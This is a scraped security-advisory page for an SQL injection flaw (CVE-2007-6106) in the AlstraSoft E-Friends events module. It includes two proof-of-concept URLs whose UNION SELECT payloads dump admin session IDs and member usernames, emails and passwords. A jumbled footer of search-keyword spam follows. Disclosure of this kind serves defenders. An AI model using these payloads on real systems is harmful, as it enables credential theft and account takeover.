about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , AlstraSoft E-Friends Events Module SQL Injection Vulnerability


Title AlstraSoft E-Friends Events Module SQL Injection Vulnerability
Published 2007-11-21-12:00AM
Updated 2007-12-18-08:06PM
Class Input Validation Error
CVE   CVE-2007-6106
Remote  Yes
Local  No
Credit  M.Hasran Addahroni is credited with the discovery of this vulnerability.
Vulnerable  AlstraSoft EFriends 4.98
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following proof-of-concept URIs are available:http://www.example.com/index.php?mode=events&act=viewevent&seid=-1%20union%20select%201,2,3,sess_id,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20admin--
http://www.example.com/index.php?mode=events&act=viewevent&seid=-1%20union%20select%201,2,3,concat(mem_id,0x3a,username,0x3a,email,0x3a,password,0x3a,fname),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20members--
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 12 Dec 2009 02:36:07 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www3xcom.v components 200 /compo 200 /compo sexs vedu a1200 www.vendic t915t mambo Remo www.indian antivirus d...72.9.1 200 /compo messenger p...w.smc. sheriya 200 /compo 200 /compo merak rpc lankasexcl k& maroc.sex. 200 /compo www.846286 youxi.52yu pron www.soudu. 200 /compo namitha.co sex egpet news for c pantyhos f young porn azureus Sex photo hadi retrospect sexvedeo 200 /compo global ann Arab Porta news for c www.oomei. 200 /compo www.c30199 news for c Www.pornse www.blue a 200 /compo registry f